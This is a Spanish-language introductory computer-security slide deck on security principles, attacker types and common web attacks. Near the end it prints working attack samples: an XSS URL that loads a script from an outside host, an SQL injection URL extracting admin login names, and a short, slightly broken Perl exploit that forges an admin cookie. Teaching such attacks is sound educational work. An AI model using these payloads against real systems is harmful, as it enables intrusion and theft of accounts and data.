Seguridad Informática
– Fundamentos de la seguridad informática
– Seguridad en ambiente de servidores
– Seguridad en plataformas Web
– Cómo proteger las redes Wi-Fi
– Recomendaciones generales para Internet
Seguridad Informática
CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA
CONFIDENCIALIDAD
INTEGRIDAD
DISPONIBILIDAD
AUTENTICIDAD
Seguridad Informática
CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA
No existe la absoluta seguridad !!
Todo es rompible si se le aplica fuerza. Una caja de vidrio se puede romper, pero también una caja fuerte de titanio. ¿Qué es más seguro: la caja de vidrio o la de titanio?
Evidentemente la de titanio, pero esto depende solamente de que herramienta utilicemos para romperla.
Todo se puede vulnerar. La única razón por la cual utilizamos rejas de fierros en nuestras casas y los bancos es porque hace que el ataque sea más lento.
Seguridad Informática
CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA
Entonces, ¿Cómo nos protegemos de la forma más eficiente posible?
Determinando que queremos proteger (ej: Hardware, datos privados, datos públicos, sistemas, etc)?
Estableciendo prioridades de los factores a proteger
Formando políticas de seguridad
Manteniendo la seguridad en el tiempo
Seguridad Informática
CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA
Debemos enfocarnos en REDUCIR EL RIESGO, y no en tratar de eliminar las amenazas, ya que es imposible.
Para eso debemos saber de QUE o QUIENES nos protegemos y también COMO nos atacan.
Seguridad Informática
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
Ataques Internos
– Premeditación (Empleados mal intencionados o ex empleados con información privilegiada)?
– Descuido
– Ignorancia
– Indiferencia de las politicas de seguridad
Ataques externos
– Hackers, Crackers, Lammers, Script-Kiddies
– Motivaciones: Ranking, reto personal, robo de datos, pruebas (pen test), etc.
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
Ataques Internos
Suplantación de identidad
Sniffing (Incluso administradores pueden hacer sniffing. Sugerencia: CIFRAR)?
Robo de información (Ej: para la competencia)?
Virus, Troyanos, Gusanos
Espionaje: Trashing, Shoulder Surfing, Grabaciones, etc
Keylogging – Keycatching
Keycatcher:
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
Ataques Externos
Ataques contra servicios WEB
Cross Site Scripting (XSS)?
SQL Injection
Exploits
Robo de Identidad
Denegación de Servicio (DoS) y Denegación de Servicio Distribuido (DDoS)?
SPAM
VIRUS
Phishing (Whishing, Hishing)?
Troyanos
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
XSS
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
XSS:
http://docs.info.apple.com/article.html?artnum=';a=document.createElement('script');a.src='//h4k.in/i.js';document.body.appendChild(a);//';alert(1)//%22;alert(2)//%22;alert(3)//–%3E
SQL Injection:
http://www.sitiovulnerable.com/index.php?id=10 UNION SELECT TOP 1 login_name FROM admin_login–
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Seguridad Informática
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
$host=shift;
if ($host eq "") {
print "Usage: webeye-xp.pl < host name>n";
exit;
}
my $browser = LWP::UserAgent->new();
my $resp = $browser->get("http://$host/admin/wg_user-info.ml","Cookie","USER_ID=0; path=/;");
$t = $resp->content;
#print $t;
";
Ejemplo de un exploit en PERL:
SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB
Página siguiente |